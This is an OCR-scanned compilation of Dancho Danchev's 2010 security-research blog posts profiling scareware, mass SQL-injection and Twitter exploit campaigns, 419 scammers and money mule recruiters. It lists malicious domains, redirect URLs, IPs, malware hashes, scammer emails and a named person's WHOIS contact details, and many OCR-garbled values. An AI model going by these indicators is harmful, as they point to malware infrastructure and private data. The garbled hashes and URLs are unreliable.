remarks: # # # in case of abuse please contact: godaccs@gmail.com # # # 
descr: Maximus hosting services 

country: MD 

admin-c: JB1004 

tech-c: JB1004 

status: ASSIGNED PA 

mnt-by: BA-GLOBALNET 

changed: bosko@globalnet.ba 20100528 
source: RIPE 


person: Jerkovic Bosko 

address: Josipa Vancasa 10 

address: 71000 Sarajevo 

address: Bosnia and Herzegovina 

phone: +387 33 221093 

e-mail: bosko@globalnet.ba 

nic-hdl: JB1004 

mnt-by: BA-GLOBALNET 

changed: bosko@globalnet.ba 20070309 
source: RIPE 


Surprise, Surprise, where do we know that godaccs@gmail.com abuse email from? From 
the previously profiled "[5]Dissecting the 100,000+ Scareware Serving Fake YouTube Pages 
Campaign". In particular: 


- AS43134, Donstroy Ltd; Emails: donstroitel@mail.com; godaccs@gmail.com 
- AS42560, MAXIMUS-NET-SERVICES; Emails: godaccs@gmail.com 


Responding to 77.78.239.4 (online-photo-albums.org) are also the following domains: 
hyporesist.com - Email: Kyle.MoodyAl@yahoo.com - Used to register ever52592g.com; miror- 
counter.org; mnfrekjivr.com 

newsbosnia.org - Email: qggrvpvwiw@whoisservices.cn - [6]ZeuS crimeware C &C 
online-photo-albums.org - Email: protect@privacy.com.ua 

search-static.org - Email: Kyle.MoodyAl@yahoo.com 

spmfb2299.com - Email: laycxpqguk@whoisservices.cn 

spmfb3309.com - Email: qhyfafvqyh@whoisservices.cn 
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vostokgearorg - Email: afgjvubuym@whoisservices.cn 


Where’s the mass SQL injection attack connection? Within AS42560, responding to 
77.78.239.56 are also the following domains, part of the campaign: 


google-server09.info 


google-server10.info 


google-server11.info 


google-server12. info 


google-serverl14.info 


google-server29.info 


google-server31.info 


jhuiuhxfgxhitkjhjth.info 


jhuiuhxigxhttkjhjth.info 


jhuluhyfgxhitkjhjth.into 


top-teen-porn.info 


google-server09.info - Email: 
google-server10.info - Email: 
google-server11.info - Email: 
google-server12.info - Email: 
google-server14.info - Email: 
google-server29.info - Email: 
google-server31.info - Email: 


77.78.239.56 NET 77.78.192.0/18 ——4S-pe as42560 


kitO0066@gmail.com 
kitO0066@gmail.com 
kitO0066@gmail.com 
kitO0066@gmail.com 
kitO0066@gmail.com 
kitO0066@gmail.com 
kitO0066@gmail.com 


jhuiuhxfgxhlifkjhjth.info - Email: kitO0O066@gmail.com 
jhuiuhxfgxhtfkjhjth.info - Email: kitO00066@gmail.com 
jhuluhxfgxhlifkjhjth.info - Email: kitO00066@gmail.com 
top-teen-porn.info - Email: kitO0066@gmail.com 
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Sample mass injection URLs: 
google-server09.info/ urchin.js 
google-server10.info/ urchin.js 
google-server11.info/ urchin.js 
google-server12.info/ urchin.js 
google-server14.info/ urchin.js 
google-server29.info/ urchin.js 
google-server31.info/ urchin.js 
jhuiuhxfgxhlifkjhjth.info/ urchin.js 
jhuiuhxfgxhtfkjhjth.info/ urchin.js 
jhuluhxfgxhlifkjhjth.info/ urchin.js 


Detection rate: 

- urchin.js - [7]Trojan.JS.Redirector.ca (v); JS:Downloader-LP - Result: 4/41 (9.76 %) 
MD5: 3f2bc50c30ed8e7997b3de3d528d0ed5 

SHA1: 66d6edef711516201f20fce676175ad16777e162 


Sample exploitation structure from the mass SQL injection campaign: 

- google-server31.info /urchin.js 

- Scanner-Album.com/?affid=382 &subid=landing - 91.212.127.19, AS49087, Telos-Solutions- 
AS - Email: systemman _mk@gmail.com 

- websitecoolgo.com/cgi-bin /158 - 91.188.59.220 - AS6851, BKCNET "SIA" IZZI - Email: mar- 
comarcian@hotmailbox.com 

- websitecoolgo.com /cgi-bin/random content leading to CVE-2007-5659 
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Parked on 91.212.127.19 (Scanner-Album.com), AS49087, Telos-Solutions-AS: 
automaticsecurityscan.com - Email: robertwatkins@hotmailbox.com 
bigsecurityscan.com - Email: robertwatkins@hotmailbox.com 
bigsecurityscan.com - Email: robertwatkins@hotmailbox.com 
blacksecurityscan.com - Email: robertwatkins@hotmailbox.com 
edscorpor.com - Email: leonschmura@hotmailbox.com 
edsctrum.com - Email: admin@edsfiles.com 

edsfiles.com - Email: leonschmura@hotmailbox.com 

edsfilles.com - Email: leonschmura@hotmailbox.com 

edsletter.com - Email: leonschmura@hotmailbox.com 
edslgored.com - Email: leonschmura@hotmailbox.com 
edsnewter.com - Email: leonschmura@hotmailbox.com 
edsogos.com - Email: leonschmura@hotmailbox.com 

edsspectr.com - Email: leonschmura@hotmailbox.com 
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edstoox.com - Email: leonschmura@hotmailbox.com 
findsecurityscan.com - Email: robertwatkins@hotmailbox.com 
memory-scanner.com - Email: systemman _mk@gmail.com 
onefindup.org - Email: JamesHying@xhotmail.net 
scanner-album.com - Email: systemman _mk@gmail.com 
scanner-definition.com - Email: rutkowski _m3@gmail.com 
scanner-hardware.com - Email: systemman _mk@gmail.com 
scanner-master.com - Email: systemman _mk@gmail.com 
scanner-models.com - Email: systemman _mk@gmail.com 
scanner-profile.com - Email: systemman _mk@gmail.com 
scanner-programming.com - Email: systemman _mk@gmail.com 
scanner-supplies.com - Email: rutkowski m3@gmail.com 
scanner-tips.com - Email: systemman _mk@gmail.com 
searchdubles.org - Email: MerleMeisin@xhotmail.net 
searchmartiup.org - Email: MerleMeisin@xhotmail.net 
searchprasup.org - Email: MerleMeisin@xhotmail.net 
searchprodinc.org - Email: MerleMeisin@xhotmail.net 
searchprodinc.org - Email: MerleMeisin@xhotmail.net 
searchtanup.org - Email: MerleMeisin@xhotmail.net 
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Responding to 91.188.59.220 and 91.188.59.221 (websitecoolgo.com) within AS6851, BKCNET 
"SIA" IZZI are also the following domains participation in different campaigns: 
internetgotours.com - Email: marcomarcian@hotmailbox.com 
mediaboomgo.com - Email: paulalameda@hotmailbox.com 
mediagotech.com - Email: marcomarcian@hotmailbox.com 
mediaracinggo.com - Email: paulalameda@hotmailbox.com 
netgozero.com - Email: marcomarcian@hotmailbox.com 
nethealthcarego.com - Email: marcomarcian@hotmailbox.com 
networkget.com - Email: marcomarcian@hotmailbox.com 
networksportsgo.com - Email: marcomarcian@hotmailbox.com 
patricknetgo.com - Email: paulalameda@hotmailbox.com 
webaliveget.com - Email: paulalameda@hotmailbox.com 
webcoolgo.com - Email: paulalameda@hotmailbox.com 
webgettraffic.com - Email: paulalameda@hotmailbox.com 
webgetwisdom.com - Email: marcomarcian@hotmailbox.com 
webgetwise.com - Email: marcomarcian@hotmailbox.com 
webgoengine.com - Email: paulalameda@hotmailbox.com 
webgosolutions.com - Email: paulalameda@hotmailbox.com 
webmagicgo.com - Email: paulalameda@hotmailbox.com 
websitecoolgo.com - Email: marcomarcian@hotmailbox.com 
websiteget.com - Email: marcomarcian@hotmailbox.com 


mediagotech.com 


nethealthcarego.com 


networkgetcom 


networksportsgo.com 


91.188.59.220 91.188.32.0/19 ——A“S-ge ase6s51 


nsl.mediagotech.com 
nsL.nethealthcarego.com 
nsL.networksportsgo.com 


nsl.websitecoolgo.com 


The rise of [8]custom abuse emails, conveniently offered to cybercrime-friendly dedicated 
customers? 


It’s worth pointing out that godaccs@gmail.com a.k.a Complife, Ltd is conveniently re- 
sponsible for- AS42560, BA-GLOBALNET-AS; AS43134, Donstroy Ltd; and AS42560, MAXIMUS- 
NET-SERVICES, followed by piotrek89@gmail.com responsible for [9]AS6851, BKCNET "SIA" 
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IZZI (used by the Koobface gang, also seen in the following campaigns [10]Spamvertised 
iTunes Gift Certificates and CV Themed Malware Campaigns; [11]GoDaddy’s Mass WordPress 
Blogs Compromise Serving Scareware). 


This post has been reproduced from [12]Dancho Danchev’s blog. Follow him 
[13]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2010/06/dissecting- 100000-scareware-serving.htm 
2. ttp://www.virustotal.com/analisis/2ace318127ee5b49b44df31561928a75022f 258a53e521ab4c4ab12791ec66b3- 12766 


8. http://twitter .com/danchodanchev/status/6549021186 
9. http: //ddanchev . blogspot . com/2010/06/dissecting- 100000-scareware- serving. htm 


11. http://ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs.htm 
12. http://ddanchev. blogspot .com/ 
13. http://twitter .com/danchodanche 
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6.6.5 Dissecting the Exploits/Scareware Serving Twitter Spam Campaign 
(2010-06-16 14:32) 


Have an account? Signin 


Get short, timely messages from SheilaBradley. 


| Twitter is a rich source of instantly updated information. It's easy to stay 
updated on an incredibly wide variety of topics. Join today and follow 
@BradleySheilaTt. 


t follow BradleySheilaTt I 
Codes for other countries 


Name SheilaBradiey 


BradleySheilaTt ne 


Have You Seen This Yet? em x 
http://is.gd/cQAd| @mbfromhb Le 
@ChristBooth @designthemind GY RSS fond of tradeyshedares 


@Rosalynn7885 @Jossta 
@Brendan_L @kamchatka 
@CUGHnews 


[1]Yesterday’s exploits-serving campaign spreading across Twitter, using automatically reg- 
istered accounts "pinging" random Twitter users with links to the campaign, is worth profiling 
due to its state of maliciousness - if the end user is exploitable, exploits are served ultimately 
leading to scareware, and if he isn’t, the cybercriminals behind it [2]attempt to monetize 
through the same network used by the [3]Koobface gang on Mac OS X hosts - zml.com. 


Let’s dissect the campaign, and once again emphasize on the fact just how small the 
cybercrime ecosystem could be, given enough historical data is gathered on who’s who, who’s 
what, and what’s when. 


Sample exploitation structure: 

- qtoday.info /ttds/doit.php?ckey=12 &schema=1 &f=wF - 94.228.209.73 (AS47869), 
75.125.222.242 (AS21844) 

- qtoday.info /ttds/jump.php 

- fqsmydkvsffz.com /tre/vena.html/RANDOM - 69.174.242.21 (AS13768); 75.125.222.242 
(AS21844) 
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is.gd jeQEby 0 text/html; c... 
qtoday.info jttds/doit.php?ckey=12&schema=1&Q=tp 3 text/html 
qtoday.info /ttds/jump.php S text/html 


zmi.com /?did=4848 
/?did=4848 text/html 


text/html; c... 


The scareware installed interacts with AS18866: 
69.50.197.241 /up/el.dat 

69.50.197.241 /up/e2.dat 

69.50.197.241 /data/upd6.dat 

69.50.197.241 /data/upd7.dat 

69.50.197.241 /data/upd1.dat 

69.50.197.241 /data/upd2.dat 


Responding to 69.50.197.241 (AS18866) are: 

radarixo.com - Email: moldavimo@safe-mail.net - [4]profiled here 
cyberduck.ru - Email: samm _87@email.com - [5]profiled here 
livejasment.com - Email: moldavimo@safe-mail.net 

linksandz.com - Email: moldavimo@safe-mail.net - [6]profiled here 


Detection rates: 

- el.dat - 11 0n 17 (65 %) - [7]Trojan.MulDrop1.21645; Win32/Lukicsel.P 
MD5 hash: 2566c11a9cd2226b59d226e76bae9f64 

SHA1 hash: 6a1fd405f547ed33f7cfe3abad4f423a33c0e281 


- e2.dat - 8 on 17 (47 %) - [8]W32/Witkinat.A.gen!Eldorado; Win32/Witkinat.R 
MD5 hash: 8daaa96ba059e6b1d5108c314f160175 
SHA1 hash: b43d26bb2583d9057cb343c10d5db79c846ed895 


- upd1.dat - 11 on 17 (65 %) - [9]TR/Lukicsel.EB; Trojan.Win32.Delf.aaxw A 
MD5 hash: 7b2534536cdf168f50d63845b13af8ba 
SHAI hash: 306f5199c3f91cd28c634914a6478bcbc5c4e9c0 


- upd2.dat - 11 on 17 (65 %) - [10]TR/Lukicsel.EB; Trojan.Win32.Delf.aaxw A 
MD5 hash: 323a1a2429467b3891cc20a26b82f851 
SHAI1 hash: ae3fe6b442521d95631703ab530213e897e4f8ea 


- upd6.dat - 9 on 17 (53 %) - [11]Win32/Lukicsel.P; Trojan-Dropper.Win32.Delf.frm 
MD5 hash: d05d89bdadd8a23c2ceb0b016d49550a 
SHAI1 hash: 366db3c2cd64a57587376b416c42960ad1f28ea3 


- upd7.dat - 11 on 17 (65 %) - [12]SHeur3.AAEI; Trojan-Dropper.Win32.Delf.frq 
MD5 hash: 1a582b650d82fb57bec036e1962e5da2e 
SHAI1 hash: 15a9540927f64dec23e625e140dfde7ce3d23df7 
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sfkemlymeywk,.com 
aghtdkpaoxk.com 
aghtdgpaoxk, com 
dhiftzbdoxk. com 
dbcyjnudoxk.com 


danenskgela.com 


aghoxekaoxk.com 
m.aghoxekaoxk.com 
directinmixem.com 


carsmazdaé.in 


The rest of the exploits-serving domains portfolio parked at 69.174.242.21 (AS13768); 
75.125.222.242 (AS21844): 

danenskgela.com - Email: strohmeiera@yahoo.com 
aghoxekaoxk.com - Email: tavsadr5r5@yahoo.com 
xfgswsoxoxk.com - Email: tavsadr5r5@yahoo.com 
directinmixem.com - Email: stronmeiera@yahoo.com 
carsmazdaé6.in - Email: valeriyku@gmail.com 
danenskgela.com - Email: strohmeiera@yahoo.com 
tfyxffnacsc.com - Email: edb.ri871@gmail.com 
sfkemlymeywk.com - Email: admin@overseedomainmanagement.com 
aghoxekaoxk.com - Email: tavsadr5r5@yahoo.com 
aghtdkpaoxk.com - Email: skdhdjfg7s@yahoo.com 
aghtdqpaoxk.com - Email: njgf555dfdsa@yahoo.com 
dhjftzbdoxk.com - Email: skdhdjfg7s@yahoo.com 
dbcyjnudoxk.com - Email: njgf555dfdsa@yahoo.com 
mcduimqmoxk.com - Email: fresadmsn7y@yahoo.com 
piamlzjpoxk.com - Email: fresadmsn7y@yahoo.com 
pfgswlopoxk.com - Email: 7uwy7letel@yahoo.com 
qjigaicqoxk.com - Email: 7uwy7letel@yahoo.com 
directinmixem.com - Email: stronmeiera@yahoo.com 
etyet.com - Email: zubakova2@rambler.ru 
grantgarant.com - Email: naumann _heikens@yahoo.it 
carsmazdaé6.in - Email: valeriyku@gmail.com 
civichonda.in - Email: valeriyku@gmail.com 
drotalflow.in - Email: johns2249@googlemail.com 
carsinfinity.in - Email: valeriyku@gmail.com 
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crystall.searcherystal.com 


danenskgela.com 
meduimqmoxk.com 


pfgswlopoxk.com 
——NET_y 75.125.0.0/16 ——“S-pe as21844 


piamlzjpoxk.com 
gjigaicqoxk.com 
searchcrystal.com 


www.searchcrystal.com 


3m70.cn - Email: abuseemaildhcpo@gmail.com - [13]money mule registrations, [14]rubbing 
shoulders with [15]Koobface 
mueypfigivix.com 
mbhcnjyyykpr.com 
ozkifomzaaqd.com 
dqcnefigaefg.com 
vtmxgwnpjvib.com 
jcfkprwasnaj.com 
qgwyinsxlox.com 
tsusiwpmzuqz.com 
fqsmydkvsffz.com 

acell.info 
q-fever.infovmspl.in 
keirun.in 

iscobar.in 

loncer.in 

jcfkprwasnaj.com 


The complete list of automatically registered bogus Twitter accounts, now suspended: 
twitter.com/AbbottMarleneGY 
twitter.com/AnsonjJamesJs 
twitter.com/BandaPaul51 
twitter.com/BarkleyTracy52 
twitter.com/BoserJames74 
twitter.com/BradleySheilaTt 
twitter.com/BravoMartinUT 
twitter.com/BrownTammyaM 
twitter.com/BurlingameStek2 
twitter.com/BurtonPauliC 
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twitter.com/CallowayEileemb 
twitter.com/CardilloLilli8I 
twitter.com/CareyJocelynXY 
twitter.com/CarpenterJameG1 
twitter.com/CarterErnieBj 
twitter.com/CarterNanGM 
twitter.com/CharltonRoberlY 
twitter.com/ClausenjilIRC 
twitter.com/CochranLindajB 
twitter.com/CruzShawnjl 
twitter.com/DanielClintonqO 
twitter.com/DeanLuigi7B 
twitter.com/DeleonChristiDb 
twitter.com/DickensRitaS6 
twitter.com/EllisonCortezCC 
twitter.com/FernandezRobekc 
twitter.com/FieldsRichardrx 
twitter.com/FryePhilipAx 
twitter.com/GarrisonMiltoP9 
twitter.com/GilfordSarahgqo 
twitter.com/GilleyJennifeST 
twitter.com/GiordanoHelenxy 
twitter.com/GishCharlesCy 
twitter.com/GreenDonaldbt 
twitter.com/GriffinRay5v 
twitter.com/GuzmanEloise5u 
twitter.com/HakalaSteve9e 


Link Disabled 


t may damage your P 
hittp://qtodayinfo/ttd 


twitter.com/HammonsLeonarW3 
twitter.com/HarmonRaymondMH 
twitter.com/HartHeatherSO 
twitter.com/HaynesCharlesxo 
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twitter.com/HendricksonKi6F 
twitter.com/JonesAndrewUG 
twitter.com/JonesNickolasYx 
twitter.com/KendallNormaWS 
twitter.com/KroegerAngeliuO 
twitter.com/LeeJerroldRk 
twitter.com/LevittKevin9e 
twitter.com/LewisMaryL8 
twitter.com/LimonMargaretgn 
twitter.com/MarvelThomasaO 
twitter.com/McbeeMelissabu 
twitter.com/MillerFranceswe 
twitter.com/MitchellDeborvl 
twitter.com/MooreJoanut 
twitter.com/MorrisMary2n 
twitter.com/MorrisonJackOs 
twitter.com/NealReginaldbH 
twitter.com/NickellGloriad8 
twitter.com/PhelpsRichardKL 
twitter.com/PittsTommyyy 
twitter.com/PlummerAthenawn 
twitter.com/PowellMarie94 
twitter.com/PradoDonaldG8 
twitter.com/RealeBernicegR 
twitter.com/ReeseVeronicaFx 
twitter.com/RievesShirleyYv 
twitter.com/RobinsonAprilrl 
twitter.com/RobinsonLisa8e 
twitter.com/RoblesRicardoWh 
twitter.com/RubioLanaj9 
twitter.com/SavardAnthonyoU 
twitter.com/SayersWendellVc 
twitter.com/SchmidtLynnk7 
twitter.com/ShankleKathleor 
twitter.com/SieversDarlee1D 
twitter.com/SmithGeorgieMq 
twitter.com/SteinAshleyuQ 
twitter.com/StoughKelseyqt 
twitter.com/TrejoLisa0O 
twitter.com/TullosHowardGo 
twitter.com/WeberSteven6r 
twitter.com/WhiteMichellevj 
twitter.com/WilkinsonPaulTd 
twitter.com/WillettErnestCR 
twitter.com/WilliamsMichaB1 
twitter.com/WoodsThelmay0O 
twitter.com/WynnRichard4m 
twitter.com/YoungMelanieSZ 
twitter.com/CooleyFrancescG 
twitter.com/SchneiderKim6h 
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twitter.com/DobsonElsiequ 
twitter.com/PeelLouise9q 
twitter.com/WhiteYolanda0P 
twitter.com/FrostAngeloY2 
twitter.com/MorrisMary2n 
twitter.com/MillerMaryx1 


PDF exploits, binaries streaming from the domain portfolio at 69.174.242.21 (AS13768); 
75.125.222.242 (AS21844): 

MD5: 5d42bb346601ba456b52edd3c3e59d1b 

MD5: bal19c971ledefffb22d44e43a91a7d9a9 

MD5: e7a354f58bfe21c815ddb8faf00bd08c 

MD5: 4a13b96dd056c0075c553588f0211c44 

MD5: 29e71e291a3lea8flcddbf7d96f7de86 

MD5: 29e71e291a31lea8flcddbf7d96f7de86 

MD5: 3bb6bdaf8d4e2822da86ef9ab614a04ea 

MD5: f41470c7b9ad2260625d2a62b6db158f 

MD5: 3987c92c20c3f17b5892f84069d816d1 

MD5: 87a95ec041b2432727336f0cdeeel123a 

MD5: 5d497e1841f5627a1lb77dbc336da1594 

MD5: 5balaafcef9ea7516flae7082424e83d 

MD5: 5268f85902c7064b393bbbb3dbc094f9 

SHA1: 79526ca9579420cb46c15fe94b282868cl1le/7fbbd 
SHA1: f70f6a9aa0aa092511894f7c89defc64637504al 
SHA1: 5175b38dfca3dc7dd6ad56bed34a543f14702bea 
SHA1: 2f2c88e0b950cd91ad1e49be73e885b07f401f68 
SHA1: b92d1268d06c8ba427beefclee7b064873694a47 
SHA1: 5ba7ba0dc08a3d0cd3feb363394d295637a64e10 
SHA1: 7ecb2679cd23e6c6973c57092b1cae46f60db97e 
SHA1: 66ed858043d6d022823b16956f416e3080e618al 
SHA1: Ofdd1lde26d5902d4a21b053a212a21c2760d8aee 
SHA1: 5ba7ba0dc08a3d0cd3feb363394d295637a64e10 
SHAI1: 3a7daa60389f463df795b78f16030dcc6fc1ff23 
SHA1: 3054b48186f5e0981c41f200b3492caa0941f889 
SHA1: 0e49c7656becled43efb19187541d20c3ecb293b 


This isn’t the first time Twitter’s been abused for malicious purposes, and is definitely 
not the last. Quick community response and take down actions hit them where it hurts most - 
the monetization vector. 


Related assessments of Twitter malware campaigns: 

[16]Twitter Malware Campaign Wants to Bank With You 

[17]Dissecting Koobface Worm’s Twitter Campaign 

[18]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[19]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[20]Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware 

[21]Dissecting September's Twitter Scareware Campaign 


This post has been reproduced from [22]Dancho Danchev’s blog. Follow him 
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[23]Jon Twitter. 
1. http://sunbeltblog. blogspot .com/2010/06/pdf-exploit-spamrun-on-twitter.htm 


2. bttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452?pg=2&tag=mantle_ 
EY SY EE RN TT 

4. http: //ddanchev . blogspot . com/2009/11/keeping-money-mule-recruiters-on-short -html 

5. http: //ddanchev blogspot. com/2010/05/dissecting-mass-dreamhost-sites. htm! 

6. hetp://adanchev. blogspot. con/2010/03/gaztransitstroygaztranzitstroy-fron- hia 

7 

8 

9 


| http://scanner novirusthanks. org/analysis/2566ct 1a8cd22260690226e7 bac964/2TEuZGFO/ 

_ http: //scanner .novirusthanks. org/analysis/Sdaaa06ba059e60id510B9144160175/2TTuZGFO/ 

_ http: //scanner .novirusthanks .org/analysis/7b2594636cif16815046384Sb19af a /aXBRISSKYAO=/ 
10, 
12. 
13: 


. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 


15. http: //ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client .htm 


. http://ddanchev. blogspot .com/2008/08/twitter-malware-campaign-wants-to-bank. htm 

; 

. http://ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving.htm 

. http://ddanchev. blogspot .com/2009/07/from-ukraine-with-bogus-twitter .htm 
ttp://ddanchev. blogspot .com/2009/04/twitter-worm-mikeyy-keywords-hijacked.htm 


i 
“I 


21. http://ddanchev. blogspot .com/2009/09/dissecting-septembers-twitter-scareware.htm 


22. http://ddanchev.blogspot.com/ 
23. http://twitter.com/danchodanche 


6.6.6 Sampling 419 Advance Fee Scams Activity (2010-06-17 16:25) 


naotics 
2479 MAUS 
2 SPAM EMAILS 


| NOTICE 

|e 419 MAILS 

|! @ SPAM E-MAILS 

| @ E-MAIL EXTRACTORS 
are NOT ALLOWED 


ror en cine ak tt Be | 
sates 


| 
| 


Ave oe Om 
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Lottery Winning Notifications, Western Union payment notifications, dead relatives, advance 
fee schemes impersonating law enforcement agencies - their arsenal of themes is endless, 
their IPs, however, aren’t, taking into consideration the fact that the majority of 419 scams 
are not sent using botnets, but manually, and in a targeted fashion. 


In fact, some of their spamming techniques ([1]419 scammers using Dilbert.com; [2]419 
scammers using NYTimes.com ’email this feature’) are so primitive compared to the financial 
impact, a successful advance fee has in the long term, that their KISS (Keep it Simple Stupid) 
mentality reflects the current situation within the cybercrime ecosystem - they all KISS it to 
a certain extend - "[3]Report: Malicious PDF files comprised 80 percent of all exploits for 
2009"; "[4]Reports: SQL injection attacks and malware led to most data breaches". 


For the purpose of an experiment, and related reasons. Here’s a raw snapshot of some 
419-ers that just kept popping up, over and over again. 


Persistent 419 advance fee scammers (over the last 7 days), the originating IPs, and 
the "reply to" email: 

-a_chenchen@yahoo.cn - 218.17.239.18 

- abdulkadera_maroofomar@hotmail.com - 41.138.180.86 

- alfredmorris.m@btinternet.com - 211.101.13.230 

- atmdept serv001@yahoo.cn - 193.252.22.152 

- austinalan@wanadoo.co.uk - 193.252.22.190 

- avocat doukoure@yahoo.fr - 78.229.212.4 

- barpaulaffum@live.com - 41.210.31.214 

- barr.rolandkenl@gmail.com - 221.235.112.210 

- barristerhenryivanlooconsult02@yahoo.co.jp - 60.48.104.88 

- barteddywill01@googlemail.com - 200.13.249.119 

- cocacolaofficialprizel19@yahoo.com.hk - 194.79.134.37 

- courfed@aim.com - 79.123.210.10 

- crichardchambers@rediff.com - 212.242.42.50 

- curiehenria@yahoo.com, barrO9amorisql@gmail.com - 123.176.96.137 

- dr.austenobigwe008@gmail.com - 411.211.228.112 

- drabejohn2009@aol.com - 217.72.192.242 

- duncan.macdonald@9.cn, barr duncan _macdonald@yahoo.co.uk - 86.43.60.104 
- ecowascounsellordept@gmail.com - 115.242.97.173 

- efccantigraft.nigeria077@gmail.com - 24.166.97.40 

- Email.jmwilliams66@gmail.com, misteredwin22@gmail.com - 89.144,.96.52 
- fedex.courerservices1@hotmail.com, richardjohson@live.com - 87.194.255.145 
- fedpetersO7@aim.com - 81.31.115.2 

- henryanthonyloanfirm@gmail.com - 200.40.197.69, 41.219.152.78 

- icpcmistrynig@yahoo.com, fedeministrynig@gmail.com - 91.198.227.49 

- janefugar2.u@hotmail.com - 82.196.5.120 

- jimovia8787@gmail.com - 216.222.201.201 

- john _chan3030@yahoo.com.hk - 200.171.215.2 

- loannationwide2010@windowslive.com - 222.124.26.155 

- mailesg.charlesstanley@gmail.com - 163.20.186.1 

- maroofomar _abdulkader@yahoo.com - 62.193.229.238 

- martha _ikobopayment@yahoo.com.hk - 41.138.172.81 

- microwin2010@hotmail.co.uk - 200.105.120.151 

- ministerdeliveryofficer@yahoo.cn - 193.252.22.190 
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- miss.kajat@googlemail.com - 67.15.16.31 

- missblessing@sify.com - 196.28.250.53 

- mr.parady700@hotmail.com - 80.200.242.17 

- mrabdulhaleem@gmail.com - 66.11.225.183 

- MRANNOLDSMITH2010@gmail.com - 82.128.17.211 

- mrderekpaulatm405@gmail.com - 86.209.83.68 

- Mrperentochaplain@rocketmail.com; Mrperentochalion@gmail.com - 112.110.186.25 
- mrsabueke@cantv.net - 200.11.173.131 

- niceme1970@yahoo.com - 80.12.242.27 

- ntai _jerry7775@yahoo.com.hk - 125.141.17.158 

- ochuko _baba1l@hotmail.fr - 65.55.111.159 

- ochukobabal@gmail.com - 65.55.111.85 

- officereplybackmaill@yahoo.com - 82.128.17.211 

- organlotoint39|@yahoo.com.hk - 207.194.87.105 

- promoskllotto@rocketmail.com - 90.183.38.130 

- realexchanges@aim.com - 212.225.181.101 

- rev.sistermaryx31@gmail.com - 41.211.228.112 

- robinkelley1967@hotmail.com - 85.214.37.73 

- rpatmcard@hotmail.com - 195.83.9.36 

- s.leel@yahoo.com, westernunionoffice99@gmail.com - 41.191.85.45 
- shopperconsultant@live.co.uk - 195.137.70.240 

- talkdelata3@gmail.com, mdelataecobank@gala.net - 116.255.152.124 
- thefordfoundation.award0010@yahoo.co.uk - 222.124.9.54 

- ubanigeria.nig65@gmail.com - 202.132.123.106 

- vex.pressd2009@gmail.com - 66.48.81.131 

- waziriefccng@live.com - 193.252.22.191 

- worldbpr@9.cn - 41.204.224.19 

- www.cn western _union@w.cn - 41.222.192.82 

- zakiawilol01@yahoo.co.uk - 202.132.123.106 

- zongo.ben177@gmail.com, mr _hiiut6éO@msn.com - 212.52.146.118 
- bog _officemail@yahoo.co.jp - 82.128.2.78 

- atmfinanceibc@web2mail.com - 41.218.237.202 

- mrjohnsmith7O@hotmail.com - 213.171.218.33 

- junhuan9@yahoo.cn - 218.91.39.165 


Nothing hurts as much as a decent historical OSINT regarding the activities of any cy- 
bercriminal. Moreover, this historical OSINT not only contributes to a more efficient case 
building, but also, helps to establish some pretty interesting connections within the cyber- 
crime ecosystem. As practice and experience has shown, this very same ecosystem is not 
necessarily as big as originally assumed. 


Consider going through the related fraudulent schemes/malicious campaigns currently 
taking advantage of FIFA’s World Cup - [5]Protection tips for the upcoming FIFA World Cup 
themed cybercrime campaigns. 


This post has been reproduced from [6]Dancho Danchev’s blog. Follow him 
[7]Jon Twitter. 


1. http://www.zdnet .com/blog/security/419-scammers-using-dilbertcom/3809 


2. http: //www.zdnet.com/blog/security/419-scammers-using-nytimescom-email-this-feature/3491 
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3. http://www.zdnet .com/blog/security/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-20 


http: //www.zdnet .com/blog/security/reports-sql-injection-attacks-and-malware-led-to-most-data-breaches/54 


wip s 


http: //www.zdnet .com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-camp 
6. http: //ddanchev. blogspot . com/ 
7. nsep://ewitter.con/danchodancho 


6.6.7 Money Mule Recruiters Trick Mules Into Installing Fake Transaction Certificates 
(2010-06-29 11:07) 


What is more flattering than Ukrainian blackhat SEO gangs using name as redirectors, includ- 
ing offensive messages, the Koobface gang redirecting Facebook’s IP space to your blog, or a 
plain simple danchodanchev admin panel within a Crime Pack kit? 


It’s the money mule recruiters who modify the HOSTS file of gullible mules to redirect 
ddanchev.blogspot.com and bobbear.co.uk to 127.0.0.1. Now that’s flattering, considering 
the fact that my public money mule ecosystem related research represents a tiny percentage 
of the real profiling/activities taking place behind the curtains. 


a 


Related coverage of money laundering/recruitment in the context of cybercrime: 
[1]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[2]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[4]Money Mule Recruiters on Yahoo!’s Web Hosting 

[5]Dissecting an Ongoing Money Mule Recruitment Campaign 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[7]Keeping Reshipping Mule Recruiters on a Short Leash 
[8]Keeping Money Mule Recruiters on a Short Leash 
[9]Standardizing the Money Mule Recruitment Process 

[10]Inside a Money Laundering Group’s Spamming Operations 
[11]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[12]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him 
[14]on Twitter. 


1. ftp: //ddanchev,blogapot.con/2010/04keeping-noney-mule-recrulters-on-short tal 
2. http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving . html 
3, beep: //ddanchev. blogspot. com/2010/09/keeping-noney-mule-recrusters-on-short ta 
4. netp://adanchev. blogspot .con/7010/03/uoney-mule-recrulters-oh- yahoos-veb. neal 
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5. http://ddanchev. blogspot. com/2010/02/dissecting- ongoing-money-mule. htm 


6. http: //ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short .htm 
7. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on. html 


8. http: //ddanchev. blogspot. com/2009/11/keeping-money-mule-recruiters-on-short .htm 


9. 

10. http://ddanchev. blogspot .com/2009/05/inside-money- laundering-groups- spamming. html 
